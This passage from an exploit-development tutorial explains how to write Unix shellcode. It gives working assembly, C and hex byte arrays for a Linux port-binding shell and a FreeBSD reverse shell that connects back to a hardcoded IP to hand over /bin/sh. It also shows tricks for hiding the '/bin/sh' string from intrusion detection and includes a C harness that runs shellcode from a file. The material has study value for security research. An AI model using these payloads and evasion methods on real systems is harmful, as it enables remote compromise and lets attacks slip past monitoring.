        "\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b"
        "\x50\xcd\x80\xe8\x91\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

The Linux port binding shellcode:

Linux socket code is a bit different then the BSD one. The problem is that linux
has one socket system call that can be used to query other socket functions (an API)
This system call is called 'socketcall' and is executed with two arguments. The first
argument is a number that represent a socket function (such as listen()). The second
argument is a pointer to an array that contains the argument that have to be given to 
the by the first argument defined function.. ;-) Not very useful for shellcode development.

Socketcall is called like this:

socketcall(<function number>,<arguments for that function>)

Below are the available function numbers:

SYS_SOCKET      1
SYS_BIND        2
SYS_CONNECT     3
SYS_LISTEN      4
SYS_ACCEPT      5
SYS_GETSOCKNAME 6
SYS_GETPEERNAME 7
SYS_SOCKETPAIR  8
SYS_SEND        9
SYS_RECV        10
SYS_SENDTO      11
SYS_RECVFROM    12
SYS_SHUTDOWN    13
SYS_SETSOCKOPT  14
SYS_GETSOCKOPT  15
SYS_SENDMSG     16
SYS_RECVMSG     17

And ofcourse the implementation:

BITS 32

xor             eax, eax             ; NULL eax
inc             eax                  ; eax represents 1 now 
mov long        [esi +12],eax        ; 
mov             ebx,eax
inc             eax
mov long        [esi +8],eax
add             al,0x04
mov long        [esi +16],eax
lea             ecx,[esi +8]
mov             al,102                ; 102 == socketcall
int             0x80                  ; call the kernel
mov             edx,eax               ; store the file descriptor in edx 
xor             eax, eax              ; Null eax
                                      ; Now lets make the  serv_addr struct  
mov byte        [esi + 8],0x02        ; This equals: serv_addr.sin_family=2
mov word        [esi + 10],0xAAAA     ; This equals: serv_addr.sin_port=0xAAAA
mov long        [esi + 12],eax        ; This equals: serv_addr.sin_addr.s_addr=0
mov long        [esi + 17],edx        ; edx the file descriptor
lea             ecx,[esi + 8]         ; load effective address of the struct
mov long        [esi + 21],ecx        ; and store it in [esi + 21]
inc             ebx                     
mov             ecx,ebx        
add             cl,14
mov long        [esi + 25],ecx
lea             ecx,[esi +17]
mov             al,102
int             0x80
mov             al,102
inc ebx
inc ebx
int             0x80
xor             eax,eax
inc             ebx
mov long        [esi + 21],eax
mov long        [esi + 25],eax
mov             al,102
int             0x80   
mov             ebx,eax               ; Save the file descriptor in ebx
xor             eax,eax               ; NULL eax
mov long        [esi + 12], eax       ; 
mov             ecx,eax               ; 0 == stdin 
mov             al,63                 ; dub2()
int             0x80                  ; Call kernel
inc             ecx                   ; 1 == stdout 
mov             al,63                 ; dub2()
int             0x80                  ; Call kernel 
inc             ecx                   ; 2 == stderr
mov             al,63                 ; dub2()
int             0x80                  ; Call kernel  
                                      ; From here it is just a matter of   
jmp short       callit                ; executing a shell (/bin/bash)

doit:

pop             esi
xor             eax, eax
mov byte        [esi + 9], al
lea             ebx, [esi]
mov long        [esi + 11], ebx
mov long        [esi + 15], eax
mov byte        al, 0x0b
mov             ebx, esi
lea             ecx, [esi + 11]
lea             edx, [esi + 15]
int             0x80

callit:
call            doit

db              '/bin/bash'

FreeBSD connecting shellcode:

In this example we will see how to create shellcode that creates a shell, which connects
back to a host you control. You'll be able to catch the shell by using a tool such as netcat.
In this shellcode you will have to hardcode an IP address to connect to. It is also possible
to add this ip address at the runtime of the exploit (which is a good idea). Please remember 
to convert the IP address ! for testing puposes the assembly and shellcode below will connect
to 10.6.12.33 (an machine in my tiny test lab) on port 43690. Within the code this IP address 
is converted to: 0x210c060a . You can obtain this hex value pretty easily with perl:

su-2.05a# perl -e 'printf "0x" . "%02x"x4 ."\n",33,12,6,10'
0x210c060a

Just make sure you reverse the IP address like I did with 10.6.12.33. The C code on which the
assembly is based:

#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>

int soc,rc;
struct sockaddr_in serv_addr;

int main()
{

                serv_addr.sin_family=2;
                serv_addr.sin_addr.s_addr=0x210c060a;
                serv_addr.sin_port=0xAAAA; /* port 43690 */
                soc=socket(2,1,6);
                rc = connect(soc, (struct sockaddr *)&serv_addr,0x10);
                dup2(soc,0);
                dup2(soc,1);
                dup2(soc,2);
                execve("/bin/sh",0,0);
}

And the assembly implementation:

BITS 32

jmp short      callit
doit:

pop             esi
xor             eax, eax
mov byte        [esi + 7], al
                                      ; Next code: socket(2,1,6)                                
push byte       0x06                  ; The 3e argument   
push byte       0x01                  ; The 2e argument 
push byte       0x02                  ; The 1e argument 
mov             al,97                 ; The system call number
push            eax                   ;
int             0x80                  ; And call the kernel  
                                      ; 
                                      ; Next code: connect(soc,(struct sockaddr *)&serv_addr,0x10);
mov             edx,eax               ; We store the file descriptor that was returned from socket() in edx
xor             eax,eax               ; Now we will create the sockaddr_in structure
mov byte        [esi + 9],0x02        ; This equals: serv_addr.sin_family=2
mov word        [esi + 10],0xAAAA     ; This equals: serv_addr.sin_port=0xAAAA  /* port 43690 */
mov long        [esi + 12],0x210c060a ; This equals: serv_addr.sin_addr.s_addr=0x210c060a
push byte       0x10                  ; We now start with pushing the arguments, 0x10 is the 3e one.   
lea             eax,[esi + 8]         ; Get the address of our structure, arg 2 of bind() is a pointer.
push            eax                   ; And push it on the stack, our second argument is a fact
push            edx                   ; And we push the last argument, the file descriptor, on the stack
xor             eax,eax               ; Clean up
mov             al,98                 ; System call 98 represents connect.
push            eax                   ;
int             0x80                  ; And call the kernel
                                      ;    
                                      ; Next code: dup2(cli,0) , dup2(cli,1) and dup2(cli,2) 
                                      ; We will do this in a loop since this creates smaller code.
mov             cl,3                  ; Define our counter = 3 
mov             ebx,-1                ; The C code for our loop is: b = -1; for(int i =3;i>0;i--) { dup(cli,++b) }; 
                                      ;  
l00p:                                 ; The loop code starts here.      
inc             ebx                   ; This is the instead of the ++b code 
push            ebx                   ; We push this value first because it represents the last argument 
push            edx                   ; We push the second argument, the file descriptor from accept() 
mov             al,90                 ; We define the system call
push            eax                   ;  
int             0x80                  ; And call the kernel to execute  
sub             cl, 1                 ; Substract 1 from cl
jnz l00p                              ; This will continue the loop if cl != 0   
                                      ;  
                                      ; Next the execve of /bin/sh
xor             eax,eax               ; First we create some zero's
push            eax                   ; The 3e argument == NULL
push            eax                   ; So is the second 
push            esi                   ; The first argument is a pointer to our string /bin/sh 
mov             al,59                 ; We define the system call, execve.
push            eax                   ; 
int             0x80                  ; And execute

callit:
call            doit

db              '/bin/sh'

Shellcode generated from this assembly code will look like this. I have made the IP address bold so
you'll known where to search for it if you need to change it.

char shellcode[] =
        "\xeb\x52\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0"
        "\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46"
        "\x0a\xaa\xaa\xc7\x46\x0c\x0a\x06\x0c\x21\x6a\x10\x8d\x46\x08"
        "\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff"
        "\xff\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31"
        "\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\xa9\xff\xff\xff\x2f"
        "\x62\x69\x6e\x2f\x73\x68";

Several shellcode tricks:

In some cases the buffer that causes the overflow is manipulated by the vulnerable 
program.  This happens more often then you might think and makes exploiting overflows
more difficult and often more fun !. For example many programs filter dots and slashes. 
Oh my GOD !! isn't there something we can do about this ? yes there is ;-) We can use 
the almighty 'inc' operator to increase the hex value of our ascii character. Below 
is a simple example that illustrates how to do this but first a part from Intel's description
of 'inc'.


Adds 1 to the destination operand, while preserving the state of the CF flag. The 
destination operand can be a register or a memory location.


Now an example in how to do this. Let's say we have the string: 

db            'ABCD'

We can change B in to a C by using: 

inc byte      [esi + 2] 

So what this does is the hex value of B is changed from 42 to 43 which represents C.  
A working example of the assembly code required to do this:

BITS 32

jmp short       callit

doit:   

pop             esi
xor             eax, eax
mov byte        [esi + 7], al
mov byte        [esi + 10], al
mov long        [esi + 11], esi
lea             ebx, [esi + 8]
mov long        [esi + 15], ebx
mov long        [esi + 19], eax
inc byte        [esi]                ; Now we have /bin.sh
inc byte        [esi + 4]            ; Now we have /bin/sh      
mov byte        al, 0x0b
mov             ebx, esi
lea             ecx, [esi + 11]
lea             edx, [esi + 19]
int             0x80

callit:
call            doit

db              '.bin.sh#-i#AAAABBBBCCCC'


This can also be done to obfuscate parts of shellcode that might trigger 
IDS signatures. Incstructions such as ADD, SUB INC and DEC can be useful 
for this. By using a loop you can recover strings at run time and by 
doing so you might be able get undetected by an IDS or atleast, lower the
risk of detection. Have a look at the following example:


BITS 32

jmp short       callit

doit:

pop             esi
xor             eax, eax
mov byte        [esi + 7], al
lea             ebx, [esi]
mov long        [esi + 8], ebx
mov long        [esi + 12], eax

mov             cl,7                 ; The loop begins here, we will loop 7 times
change:
dec byte        [esi + ecx - 1 ]     ; Change the byte on the right location 
sub             cl, 1                ; Update the counter 'cl'
jnz change                           ; Verify if we should break the loop 

mov byte        al, 0x0b
mov             ebx, esi
lea             ecx, [esi + 8]
lea             edx, [esi + 12]
int             0x80

callit:
call            doit

db              '0cjo0ti#AAAABBBB'



The extra -1 in the line "dec byte [esi + ecx - 1 ]" is to make sure we 
als change the byte [esi + 0]. The above assembly code will generate shell
code that changes the string '0cjo0ti' to '/bin/sh' and which will then do
an execve of it. The end result (after removing the #AAAABBB chars) will be:


char shellcode[] =
        "\xeb\x25\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
        "\x0c\xb1\x07\xfe\x4c\x0e\xff\x80\xe9\x01\x75\xf7\xb0\x0b\x89"
        "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd6\xff\xff\xff\x30"
        "\x63\x6a\x6f\x30\x74\x69";

A nice FreeBSD example to hide the /bin/sh string in simple execve shellcode:

BITS 32

mov byte        [esi + 5],0x73                 
mov byte        [esi + 1],0x62
mov byte        [esi],0x2f         
xor             eax, eax
mov byte        [esi + 7], al
mov byte        [esi + 2],0x69
push            eax
mov byte        [esi + 6],0x68
push            eax
mov byte        [esi + 4],0x2f
push            esi
mov byte        [esi + 3],0x6e
mov             al,59
push            eax
int             0x80

So the string /bin/sh is build character for character and not in the correct 
order. This will make it very hard for IDS's to detect the existance of the string! 
By creating an exploit that would shift the bold made code during execution you 
could make it extra hard to detect.

char shellcode[] =
        "\xc6\x46\x05\x73\xc6\x46\x01\x62\xc6\x06\x2f\x31\xc0\x88\x46"
        "\x07\xc6\x46\x02\x69\x50\xc6\x46\x06\x68\x50\xc6\x46\x04\x2f"
        "\x56\xc6\x46\x03\x6e\xb0\x3b\x50\xcd\x80";

A more advanced method to obfuscate your code is by encoding the shellcode and decoding
it at run time. While this seems very hard to do, trust me it is not. If you want to encode 
shellcode the best way to do this is with some help from a simple c program. More information
on doing that will be released in another document on safemode.org

Ofcourse these are just simples example of obfuscating code. It work nice but isn't
really efficient. If you are really interested in this stuff, have a look at K2's 
work at: http://www.ktwo.ca/security.html.

Trace system calls to debug assembly code:

When you assembly code doesn't work, don't give up because tools such as
ptrace and ktrace can help you allot ! They can show you the exact arguments
that are given to a system call, whether the system call was successful and if
any value was returned.

For example, if the FreeBSD connect shellcode fails, you can see why! Just work
like this:

ktrace ./s-proc -e <compiled connect assembly code>
kdump | more

snip snip snip

  1830 process  RET   write 17/0x11
  1830 process  CALL  socket(0x2,0x1,0x6)
  1830 process  RET   socket 3
  1830 process  CALL  connect(0x3,0x804b061,0x10)
  1830 process  RET   connect -1 errno 61 Connection refused

Aha ! Connection refused.

If you are developing on linux then strace is defenitly your best friend ;-)

Disassembling shellcode:

If you want to see how someone else create shellcode there are very simple ways to disassemble
it. What I normally use is a small perl script that writes the shellcode to a file. For example, if
I would like to get the assembly of the following shellcode:

char shellcode[] =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad"
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

I just put it in a perl script like this:

#!/usr/bin/perl -w

$shellcode =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad".
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

open(FILE, ">shellcode.bin");
print FILE "$shellcode";
close(FILE);

I saved the file as ww.pl and disassembled it:

[10:50pm lappie] ./ww.pl
[10:50pm lappie] ndisasm -b 32 shellcode.bin
00000000 5E                           pop esi
00000001 31C0                       xor eax,eax
00000003 B024                       mov al,0x24
00000005 CD80                      int 0x80
00000007 B024                       mov al,0x24
00000009 CD80                      int 0x80
0000000B B058                      mov al,0x58
0000000D BBADDEE1FE    mov ebx,0xfee1dead
00000012 B969191228           mov ecx,0x28121969
00000017 BA67452301          mov edx,0x1234567
0000001C CD80                     int 0x80

Et voila, here is the assembly. Now it is really easy to determine what kind of shellcode
this is and what technique is being used.

Shellcode processing program:

/*
 * Generic program for testing shellcode byte arrays.
 * Created by zillion and EVL
 *
 * Safemode.org !! Safemode.org !!
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>

/*
 * Print message
 */
static void
croak(const char *msg) {
    fprintf(stderr, "%s\n", msg);
    fflush(stderr);
}
/*
 * Educate user.
 */
static void
usage(const char *prgnam) {
    fprintf(stderr, "\nExecute code : %s -e <file-containing-shellcode>\n", prgnam);
    fprintf(stderr, "Convert code : %s -p <file-containing-shellcode> \n\n", prgnam);
    fflush(stderr);
    exit(1);
}
/*
 * Signal error and bail out.
 */
static void
barf(const char *msg) {
    perror(msg);
    exit(1);
}

/*
 * Main code starts here
 */

int
main(int argc, char **argv) {
    FILE        *fp;
    void        *code;
    int         arg;
    int         i;
    int         l;
    int     m = 15; /* max # of bytes to print on one line */

    struct stat sbuf;
    long        flen;   /* Note: assume files are < 2**32 bytes long ;-) */
    void        (*fptr)(void);

    if(argc < 3) usage(argv[0]);
    if(stat(argv[2], &sbuf)) barf("failed to stat file");
    flen = (long) sbuf.st_size;
    if(!(code = malloc(flen))) barf("failed to grab required memeory");
    if(!(fp = fopen(argv[2], "rb"))) barf("failed to open file");
    if(fread(code, 1, flen, fp) != flen) barf("failed to slurp file");
    if(fclose(fp)) barf("failed to close file");
    
    while ((arg = getopt (argc, argv, "e:p:")) != -1){ 
      switch (arg){ 
      case 'e': 
        croak("Calling code ...");
        fptr = (void (*)(void)) code;
        (*fptr)();
        break; 
      case 'p':       
        printf("\n\nchar shellcode[] =\n");
        l = m;
        for(i = 0; i < flen; ++i) {
          if(l >= m) {
            if(i) printf("\"\n");
            printf( "\t\"");
            l = 0;
          }
          ++l;
          printf("\\x%02x", ((unsigned char *)code)[i]);
        }
        printf("\";\n\n\n");
        
        break; 
      default :       
        usage(argv[0]); 
      } 
    } 
    
    
    return 0;
}